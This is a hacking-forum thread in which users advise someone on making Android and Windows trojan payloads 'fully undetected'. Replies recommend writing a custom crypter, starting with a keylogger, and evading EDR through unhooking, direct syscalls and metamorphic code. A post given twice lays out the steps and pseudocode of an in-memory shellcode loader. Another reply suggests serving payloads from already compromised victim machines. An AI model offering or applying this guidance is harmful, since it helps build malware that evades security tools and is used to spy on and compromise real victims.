[xyzuser]

Hello guys 
i wanted to make a payload fully undetected for android (apk) and windows (exe)  i just want to know how Trojans in general becomes undetected

[red_dot]

write your own crypter

[Meanjellybean]

Build it from scratch and dont upload it to virus total.

Start with a key logger would be my suggestion.

[tengusec]

You could try bypassing the EDR hooks, but they are pretty good at detecting unhooking these days.

Here's a recent blog post about some tactics: https://malwaretech.com/2023/12/an-intro...hooks.html and https://malwaretech.com/2023/12/silly-ed...-them.html

[Sphex]

The links are helpful tx.

[red_dot]

Build it from scratch and dont upload it to virus total.

Start with a key logger would be my suggestion.

think the best way to start decing crypter is to start with shellcode you can generate one even with msfvenom. If you will acheive FUD msfvenom shellcode injection you can proceed to learn about process injection. 

Your basic crypter should: 
1. Decrypt payload in-memory
2. Allocate RW memory
3. Move payload to allocated memory 
4. Change allocated memory protection to RX
5. Create new thread at base address of allocated memory


pseudo code:

shellcode = [ 0x4C, 0x8B, 0xD1, 0xB8, 0xBE, 0x0F, 0x05 ... ]
currentProcess = GetCurrentProcess()

baseAddress = AllocateVirtualMemory(currentProcess, shellcode.length, MEM_COMMIT, PAGE_READWRITE)
Move(shellcode, baseAddress)
VirtualProtect(currentProcess, baseAddress, shellcode.length, PAGE_EXECUTE_READ)

threadHadle = CreateThread(currentProcess, baseAddress)
WaitForSingleObject(threadHandle)

Crypter also need to have anti memory scanning method that works like encryption-decryption loop of payload that lives in allocated memory.
And dont forget about Direct Syscall's or unhooking bcs every modern AV/EDR will detect this WinAPI call chain and flag your binary as a virus.

https://github.com/JLospinoso/gargoyle
https://github.com/am0nsec/HellsGate

[Nevertheless]

A few other tips :
- Re-use code that is used by legitimate programs to achieve your objective, makes it harder to add detection rules that doesn't brake said legitimate programs.
- Don't use fishy techniques that are easily catched by detection rules
- Make your assembly code metamorphic and don't use obfuscation that looks suspicious

Also, don't put in your payload sent to your targets the method used to randomize the assembly, rather have it be done on past targets that are known not to have anti-malware, defender, IDS / IPS etc and serve it to your targets from them.

To serve payloads from past targets, you can use for example already opened and forwarded ports, servers, or add UPnP rules when possible

[lordpro]

also another tips, there are lots of source codes on github that are showing how malware encryption and AV evasion works, https://github.com/search?q=crypter&type...ars&o=desc check this out

[Vittlesical]

Hello guys 
i wanted to make a payload fully undetected for android (apk) and windows (exe)  i just want to know how Trojans in general becomes undetected

First you need to know how anti-virus products detect malwares.
most of av products uses the following techniques:

Signature-based Detection
which basically comparing files against a database of known malware signatures.

Heuristic Analysis
detect the malware based on its behavior rather than specific signatures( like if theres anything suspicious e-g Registry Changes (In windows) it detects it as malware)

Sandboxing
its like executing the malware in sandbox to to observe its behavior.

etc etc etc.


im such a yapper lol.

how to bypass them? simply dont upload your shit to VirusTotal/ apply more techniques like encryption/obfuscation/CodeSigning if you have cert(in windows)
check this article: https://www.vaadata.com/blog/antivirus-a...echniques/

This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: See you on the other side.

[DonaldTrump]

Build it from scratch and dont upload it to virus total.

Start with a key logger would be my suggestion.

think the best way to start decing crypter is to start with shellcode you can generate one even with msfvenom. If you will acheive FUD msfvenom shellcode injection you can proceed to learn about process injection. 

Your basic crypter should: 
1. Decrypt payload in-memory
2. Allocate RW memory
3. Move payload to allocated memory 
4. Change allocated memory protection to RX
5. Create new thread at base address of allocated memory


pseudo code:

shellcode = [ 0x4C, 0x8B, 0xD1, 0xB8, 0xBE, 0x0F, 0x05 ... ]
currentProcess = GetCurrentProcess()

baseAddress = AllocateVirtualMemory(currentProcess, shellcode.length, MEM_COMMIT, PAGE_READWRITE)
Move(shellcode, baseAddress)
VirtualProtect(currentProcess, baseAddress, shellcode.length, PAGE_EXECUTE_READ)

threadHadle = CreateThread(currentProcess, baseAddress)
WaitForSingleObject(threadHandle)

Crypter also need to have anti memory scanning method that works like encryption-decryption loop of payload that lives in allocated memory.
And dont forget about Direct Syscall's or unhooking bcs every modern AV/EDR will detect this WinAPI call chain and flag your binary as a virus.

https://github.com/JLospinoso/gargoyle
https://github.com/am0nsec/HellsGate

Nice info keep it going